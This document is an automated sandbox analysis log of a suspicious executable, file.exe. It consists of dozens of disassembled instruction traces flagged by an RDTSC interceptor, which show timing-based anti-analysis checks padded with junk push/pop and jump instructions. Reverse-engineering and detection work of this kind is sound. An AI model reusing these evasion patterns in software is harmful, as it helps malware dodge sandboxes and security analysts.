              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959987 second address: 9599AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD979248A87h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jne 00007FD979248A76h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9599AD second address: 9599B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95EBD0 second address: 95EC0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jno 00007FD979248A76h 0x0000000e jmp 00007FD979248A81h 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FD979248A88h 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95EC0A second address: 95EC39 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD978BA9B39h 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E373 second address: 95E377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E377 second address: 95E391 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD978BA9B16h 0x00000008 jmp 00007FD978BA9B20h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E66A second address: 95E686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FD979248A7Bh 0x0000000f jne 00007FD979248A76h 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E686 second address: 95E68B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E68B second address: 95E691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E982 second address: 95E987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E987 second address: 95E994 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 popad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E994 second address: 95E99A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962F6D second address: 962F71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962F71 second address: 962F96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FD978BA9B16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007FD978BA9B1Eh 0x00000012 jp 00007FD978BA9B16h 0x00000018 push edi 0x00000019 pop edi 0x0000001a pushad 0x0000001b jg 00007FD978BA9B16h 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F180 second address: 90F1E4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov ch, bl 0x0000000d mov ebx, dword ptr [ebp+12482221h] 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007FD979248A78h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D1B71h], ecx 0x00000033 add eax, ebx 0x00000035 call 00007FD979248A85h 0x0000003a ja 00007FD979248A7Ch 0x00000040 pop ecx 0x00000041 push eax 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9683DE second address: 9683EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD978BA9B1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9683EF second address: 968403 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9686BF second address: 9686EB instructions: 0x00000000 rdtsc 0x00000002 js 00007FD978BA9B16h 0x00000008 jng 00007FD978BA9B16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop esi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD978BA9B22h 0x00000019 jo 00007FD978BA9B16h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9686EB second address: 9686F1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96887C second address: 968880 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9689E4 second address: 9689F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FD979248A76h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9689F3 second address: 9689F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9689F7 second address: 9689FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9689FD second address: 968A1E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD978BA9B1Ah 0x00000008 jmp 00007FD978BA9B1Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 968A1E second address: 968A23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D0F90 second address: 8D0FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD978BA9B1Ah 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96F628 second address: 96F62E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96F62E second address: 96F64D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD978BA9B20h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FD978BA9B16h 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96F64D second address: 96F66A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96FAA6 second address: 96FAAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96FAAA second address: 96FAC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A84h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96FAC2 second address: 96FACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9708BC second address: 9708C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9708C2 second address: 9708CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD978BA9B16h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9708CC second address: 9708D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9708D0 second address: 9708DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9708DC second address: 9708E2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972A22 second address: 972A2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972A2E second address: 972A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976979 second address: 976983 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 975C41 second address: 975C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD979465336h 0x0000000a jmp 00007FD979465345h 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 975C61 second address: 975C67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 975C67 second address: 975C6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 975F08 second address: 975F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9764D9 second address: 9764DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9764DD second address: 9764F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD9790E7D60h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9764F7 second address: 976501 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD979465336h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976501 second address: 97650A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976697 second address: 97669B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97B2E0 second address: 97B30C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9790E7D65h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jno 00007FD9790E7D61h 0x00000011 jmp 00007FD9790E7D5Bh 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 981DCF second address: 981DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 981DD5 second address: 981DDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 981DDB second address: 981DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007FD979465336h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 981DED second address: 981DF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 981DF2 second address: 981DFC instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD97946533Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 981DFC second address: 981E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jns 00007FD9790E7D56h 0x00000011 jp 00007FD9790E7D56h 0x00000017 pop edi 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 980C45 second address: 980C4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 985380 second address: 98539E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD9790E7D68h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98539E second address: 9853A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9853A3 second address: 9853C9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD9790E7D6Dh 0x00000008 jmp 00007FD9790E7D67h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9853C9 second address: 9853DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jg 00007FD97946533Ch 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9853DA second address: 9853DF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98521F second address: 98522F instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD979465336h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CD93D second address: 8CD947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CD947 second address: 8CD957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jnp 00007FD979465336h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 998C40 second address: 998C46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 998803 second address: 998809 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99ADB3 second address: 99ADCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD9790E7D64h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99ADCB second address: 99ADCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99ADCF second address: 99ADD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A941 second address: 99A945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A945 second address: 99A95A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9790E7D61h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A95A second address: 99A97A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FD97946534Ah 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EB42 second address: 99EB5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD9790E7D5Ch 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d jne 00007FD9790E7D56h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4B9A second address: 9A4BBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979465349h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4BBB second address: 9A4BBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA56C second address: 9AA57A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA57A second address: 9AA588 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FD9790E7D5Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B84BC second address: 9B84D7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD979465336h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007FD97946533Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B84D7 second address: 9B84DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B84DC second address: 9B84EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FD97946533Ch 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B742A second address: 9B7437 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop esi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B783D second address: 9B7855 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD979465342h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B7855 second address: 9B7864 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD9790E7D56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8241 second address: 9B8247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8247 second address: 9B824B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BAEAC second address: 9BAEB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BAEB9 second address: 9BAEBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BAD4D second address: 9BAD51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BAD51 second address: 9BAD55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CAE9A second address: 9CAEC2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD97946533Ch 0x00000008 jnl 00007FD979465336h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jc 00007FD97946534Eh 0x00000016 jp 00007FD97946533Eh 0x0000001c push eax 0x0000001d push edx 0x0000001e push edi 0x0000001f pop edi 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D8CB5 second address: 9D8CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007FD9790E7D62h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F26EE second address: 9F26F6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F26F6 second address: 9F26FB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F1869 second address: 9F18B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FD979465336h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007FD97946534Ch 0x00000012 jng 00007FD979465348h 0x00000018 jmp 00007FD979465342h 0x0000001d popad 0x0000001e je 00007FD979465354h 0x00000024 push esi 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F2272 second address: 9F227F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jo 00007FD9790E7D5Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F3DB5 second address: 9F3DB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F3DB9 second address: 9F3DD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9790E7D65h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5398 second address: 9F539C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F8247 second address: 9F8251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
